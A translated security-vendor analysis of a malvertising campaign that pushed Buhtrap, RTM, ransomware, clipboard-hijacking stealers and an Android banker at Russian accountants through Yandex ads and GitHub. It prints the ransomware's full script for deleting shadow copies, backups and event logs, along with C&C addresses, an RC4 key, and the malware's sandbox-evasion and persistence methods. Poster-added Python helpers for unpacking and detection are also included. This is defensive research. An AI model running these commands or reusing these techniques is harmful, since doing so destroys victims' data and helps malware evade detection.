Buhtrap backdoor and ransomware distributed using Yandex.Direct

To target accountants in a cyberattack, you can use the work documents they search for online. That is roughly what a cyber group has been doing over the past few months, distributing the known Buhtrap and RTM backdoors, as well as ransomware and software for stealing cryptocurrencies. Most of the targets are in Russia. The attack was carried out by placing malicious advertisements on Yandex.Direct. Potential victims were directed to a website where they were prompted to download a malicious file disguised as a document template. Yandex removed the malicious advertising after our warning.

Buhtrap's source code was previously leaked online, so anyone can use it. We have no information about the availability of the RTM code.

In this post we describe how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM are back in business

Distribution method and victims

The various payloads delivered to victims share a common distribution method. All malicious files created by the attackers were placed in two different GitHub repositories.

Typically, a repository contained a single downloadable malicious file that changed frequently. Since GitHub allows the change history of a repository to be viewed, we can see which malware was distributed at a given point in time. To convince the victim to download the malicious file, the website blanki-shabloni24[.]ru, shown in the figure above, was used.

The design of the site and all the names of the malicious files follow a single theme: forms, templates, contracts, samples, and so on. Given that Buhtrap and RTM software had already been used in attacks on accountants in the past, we assumed that the strategy in the new campaign was the same. The only question was how the victim reached the attackers' site.

Infection

At least several of the victims who ended up on this site were drawn in by malicious advertising. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As you can see from the link, the banner was posted on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on different sites, all had the same campaign id (blanki_rsya), and most were related to accounting or legal assistance services. The URL shows that the potential victim used the query "download invoice form," which supports our hypothesis of a targeted attack. Below are the sites on which the banners appeared and the corresponding search queries.

  • download invoice form - bb.f2[.]kz
  • contract template - Ipopen[.]ru
  • application complaint template - 77metrov[.]ru
  • agreement form - blank-dogovor-kupli-prodazhi[.]ru
  • supreme court template - zen.yandex[.]ru
  • complaint template - yurday[.]ru
  • contract form template - Regforum[.]ru
  • contract form - assistentus[.]ru
  • apartment agreement template - napravah[.]com
  • legal contract templates - avito[.]ru

The blanki-shabloni24[.]ru site was probably set up to pass a simple visual assessment. Typically, an advertisement pointing to a professional-looking site with a link to GitHub does not look like anything malicious. In addition, the attackers uploaded the malicious files to the repository only for a limited period, probably during the campaign. Most of the time, the GitHub repository contained an empty zip archive or an empty EXE. Thus, the attackers could distribute advertisements through Yandex.Direct on sites most likely to be visited by accountants who arrived in response to specific search queries.

Next, let us look at the different payloads distributed in this way.

Payload analysis

Distribution chronology

The campaign started at the end of October 2018 and was active at the time of writing. Since the entire repository was publicly available on GitHub, we compiled an accurate timeline of the distribution of six different malware families (see the figure below). We added a line showing when the banner link was detected, as measured by ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February can be explained by the fact that we do not have part of the change history, because the repository was removed from GitHub before we could obtain it in full.

Figure 1. Malware distribution history.

Code signing certificates

The campaign used multiple certificates. Some signed more than one malware family, which further indicates that the different samples belong to the same campaign. Despite having the private key, the operators did not sign the binaries systematically and did not use the key for all samples. At the end of February 2019, the attackers started creating invalid signatures using a certificate owned by Google for which they did not have the private key.

All certificates involved in the campaign and the malware families they signed are listed in the table below.

[Table: code-signing certificates used in the campaign and the malware families they signed]

We also used these code signing certificates to establish links with other malware families. For most of the certificates, we found no samples that were not distributed through the GitHub repository. However, the TOV "MARIYA" certificate was used to sign malware from the Wauchos botnet, adware and miners. It is unlikely that this malware is related to this campaign. Most likely, the certificate was bought on the dark web.

Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. This is a Delphi binary that is sometimes packed. It was distributed in February and March 2019. It behaves as a ransomware program should: it scans local drives and network folders and encrypts the files it finds. It does not need an Internet connection to compromise a machine, because it does not contact a server to send encryption keys. Instead, it appends a "token" to the end of the ransom message and suggests using e-mail or Bitmessage to contact the operators.

To encrypt as many valuable resources as possible, Filecoder.Buhtrap runs a thread designed to shut down important software that may hold open file handles on data that would interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery more difficult. To do this, it runs the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap uses the legitimate online service IP Logger, designed to collect information about website visitors. It is used to track ransomware victims, which is the job of the following command line:

mshta.exe "javascript:document.write('');"

Files are selected for encryption if they do not match three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains a directory string from the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are also excluded from encryption, among them the file name of the ransom message. The list is given below. Obviously, all these exceptions are intended to keep the machine bootable, but with minimal usability.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption scheme

Once executed, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible for this is shown in Figure 2.

Figure 2. Hex-Rays decompiler output of the 512-bit RSA key generation routine.

Below is an example of the plaintext containing the generated private key, which is the token attached to the ransom message.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' public key (exponent e and modulus n) is hard-coded in the sample.


Files are encrypted using AES-128-CBC with a 256-bit key. For each encrypted file a new key and a new initialization vector are generated. The key information is appended to the end of the encrypted file. Let us consider the format of an encrypted file.
Encrypted files have the following header:

[Figure: header of an encrypted file]

The original file data, with the VEGA magic value prepended, is encrypted up to the first 0x5000 bytes. All the data needed for decryption is appended to the file in the following structure:

[Figure: structure of the encryption data appended to the file]

- The file size marker contains a flag indicating whether the file is larger than 0x5000 bytes.
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. Having identified a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to mask its behaviour is string encryption. The operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period the malware was spreading, only a small amount of BTC was sent to the attackers' Bitcoin wallet, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions are related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for several days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this program; the description is still relevant. In January 2019, Palo Alto Networks also published a blog post about RTM.

Buhtrap Loader

For a while, a downloader was available on GitHub that did not resemble previous Buhtrap tools. It contacts https://94.100.18[.]67/RSS.php?<some_id> to fetch the next stage and loads it directly into memory. We can distinguish two behaviours of the second-stage code. In the first, the RSS.php URL served the Buhtrap backdoor directly; this backdoor is very similar to the one available since the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor, and they are allegedly run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process we discussed before. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most campaigns we have seen, the operators did not bother to change this key.

The second, more complex behaviour was that the RSS.php URL was passed to another loader. It implemented some obfuscation, such as rebuilding the import table dynamically. The purpose of the loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we observed being executed by this loader was the Buhtrap backdoor, but there may have been other components.

Android/Spy.Banker

Interestingly, an Android component was also found in the GitHub repository. It was in the master branch for only one day, November 1, 2018. Apart from being posted on GitHub, ESET telemetry found no evidence of distribution of this malware.

The component was packaged as an Android Application Package (APK). It is heavily obfuscated. The malicious behaviour is hidden in an encrypted JAR inside the APK. It is encrypted with RC4 using this key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which starts immediately after the length field.
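As an added example (my own analysis helper, not ESET's code or the malware's), the following Python script unpacks the container just described: it reads the 4-byte length field, RC4-decrypts that many bytes with the key listed above, and checks for the ZIP signature that every JAR starts with. The page does not state the byte order of the length field, so little-endian is an assumption here, and the sample JAR is a constructed empty archive.

```python
import struct
from typing import Optional

# RC4 key as listed on the page for the Android/Spy.Banker component.
RC4_KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation,
    so this also serves to decrypt the strings the page says use the same key."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_jar(container: bytes, key: bytes = RC4_KEY) -> bytes:
    """Parse the image/files container: 4-byte length, then the RC4-encrypted JAR.
    Little-endian byte order for the length is an assumption (not stated on the page)."""
    if len(container) < 4:
        raise ValueError("container too short for a length field")
    (length,) = struct.unpack("<I", container[:4])
    blob = container[4:4 + length]
    if len(blob) != length:
        raise ValueError(f"length field says {length} bytes, only {len(blob)} present")
    jar = rc4(key, blob)
    if jar[:2] != b"PK":                       # every JAR is a ZIP, which starts with 'PK'
        raise ValueError("decrypted data does not look like a JAR/ZIP")
    return jar


def build_container(jar: bytes, key: bytes = RC4_KEY) -> bytes:
    """Constructed test fixture: wrap a plaintext JAR in the same container layout."""
    return struct.pack("<I", len(jar)) + rc4(key, jar)


# Constructed minimal ZIP: an empty archive consisting of one end-of-central-directory record.
SAMPLE_JAR = b"PK\x05\x06" + b"\x00" * 18

if __name__ == "__main__":
    recovered = extract_jar(build_container(SAMPLE_JAR))
    print("round trip ok:", recovered == SAMPLE_JAR)
```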

After decrypting the file, we found that it was Anubis, a previously documented banker for Android. The malware has the following features:

  • microphone recording
  • taking screenshots
  • obtaining GPS coordinates
  • keylogger
  • encrypting device data and demanding a ransom
  • sending spam

Interestingly, the banker used Twitter as a backup communication channel to obtain another C&C server. The sample we analysed used the @JonesTrader account, but at the time of analysis it had already been blocked.

The banker contains a list of targeted applications on the Android device. It is longer than the list found in the Sophos study. The list includes many banking applications, online shopping programs such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign was a .NET Windows executable that appeared in March 2019. Most of the versions studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component uses the clipboard. Its targets are a wide range of cryptocurrencies, as well as trade offers on Steam. In addition, it uses the IP Logger service to steal private Bitcoin WIF keys.

Protection mechanisms
In addition to the benefits ConfuserEx provides in hindering debugging, dumping and tampering, the component includes the ability to detect antivirus products and virtual machines.

To check whether it is running in a virtual machine, the malware uses the built-in Windows WMI command line (WMIC) to query BIOS information, namely:

wmic bios

The program then analyses the output of the command and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to Windows Security Center using the ManagementObjectSearcher API, as shown below. After base64 decoding, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. Routine for detecting antivirus products.

In addition, the malware checks whether CryptoClipWatcher, a tool for protecting against clipboard attacks, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then changes the value of Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell in the Windows registry and appends the path to updater.exe. In this way, the malware is executed every time the user logs in.

Malicious behaviour

Like ClipBanker, the malware monitors the contents of the clipboard and looks for cryptocurrency wallet addresses, and if it finds one, replaces it with one of the operator's addresses. Below is the list of targeted address types, based on what was found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

For each address type there is a corresponding regular expression. The STEAM_URL value is used to attack the Steam system, as can be seen from the regular expression used to define it:

\b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+\b
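As an added example (not the page's or ESET's code), here is a small detector for the swap behaviour described for both ClipBanker components: it classifies clipboard contents into a few of the address classes named above and flags an address being overwritten by a different address of the same class within milliseconds of being copied, which is how a clipboard hijacker differs from a person re-copying something. The patterns other than STEAM_URL are my own approximations, the process names and the event log are constructed, and updater.exe stands in for the persistence file name given on the page.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Address classes to watch. Names follow the identifiers listed on the page; the patterns
# are approximations written for this example (not the malware's own), except STEAM_URL,
# which follows the regular expression quoted on the page.
ADDRESS_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "BTC_P2PKH":  re.compile(r"1[1-9A-HJ-NP-Za-km-z]{25,34}"),
    "BTC_P2SH":   re.compile(r"3[1-9A-HJ-NP-Za-km-z]{25,34}"),
    "BTC_BECH32": re.compile(r"bc1[02-9ac-hj-np-z]{25,59}"),
    "ETH_ERC20":  re.compile(r"0x[0-9a-fA-F]{40}"),
    "STEAM_URL":  re.compile(
        r"(https://|http://|)steamcommunity\.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+"),
}


def classify(text: str) -> Optional[str]:
    """Return the address class the clipboard text belongs to, or None for ordinary text."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.fullmatch(text):
            return name
    return None


@dataclass
class ClipEvent:
    ts_ms: int   # time the clipboard was written
    owner: str   # process that wrote it (constructed; on Windows GetClipboardOwner gives this)
    text: str    # clipboard text after the write


def detect_swaps(events: List[ClipEvent], window_ms: int = 500) -> List[dict]:
    """Flag a ClipBanker-style swap: an address replaced by a *different* address of the
    same class almost immediately after it was copied. Plain text and class changes
    (e.g. a BTC address followed by an ETH address) are ignored."""
    alerts: List[dict] = []
    prev: Optional[ClipEvent] = None
    for ev in events:
        cls = classify(ev.text)
        if (prev is not None and cls is not None and cls == classify(prev.text)
                and ev.text != prev.text and ev.ts_ms - prev.ts_ms <= window_ms):
            alerts.append({"class": cls, "original": prev.text,
                           "replacement": ev.text, "by": ev.owner})
        prev = ev
    return alerts


# Constructed event log (not real telemetry); the bech32 strings are public example addresses.
SAMPLE_EVENTS = [
    ClipEvent(1000, "explorer.exe", "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"),
    ClipEvent(1080, "updater.exe",  "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"),
    ClipEvent(5000, "chrome.exe",   "https://steamcommunity.com/tradeoffer/new/?partner=123456&token=AbCd1234"),
    ClipEvent(5050, "updater.exe",  "https://steamcommunity.com/tradeoffer/new/?partner=999999&token=ZzZz0000"),
    ClipEvent(9000, "explorer.exe", "meeting notes for Tuesday"),
    ClipEvent(9100, "explorer.exe", "0x" + "ab" * 20),
]

if __name__ == "__main__":
    for a in detect_swaps(SAMPLE_EVENTS):
        print(f"{a['class']}: {a['original']} -> {a['replacement']} (written by {a['by']})")
```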

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the private WIF keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as the exfiltration channel for the private WIF keys. To do this, the operators place the private key data in the User-Agent HTTP header, as shown below.

Figure 4. IP Logger console with exfiltrated data.

The operators did not use iplogger.org to exfiltrate wallets. They probably used a different method because of the 255-character limit on the User-Agent field shown in the IP Logger web interface. In the samples we studied, the other exfiltration server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not set anywhere in the code. This suggests that the malware is still in development and that the variable is set on the operator's test machine.

There is another sign that the program is under development. The binary contains two iplogger.org URLs, and both are queried when data is exfiltrated. In requests to one of these URLs, the value in the Referer field is prefixed with "DEV /". We also found a version that was not packed with ConfuserEx, in which the receiver for this URL is named DevFeedbackUrl. Based on the name of the environment variable, we believe the operators plan to use the legitimate Discord service and its web-hook system to steal cryptocurrency wallets.

Conclusion

This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organisations, but we would not be surprised to see a similar attack using non-Russian services. To avoid compromise, users must be confident in the origin of the software they download.

A full list of indicators of compromise and MITRE ATT&CK techniques is available at the link.

source: www.habr.com
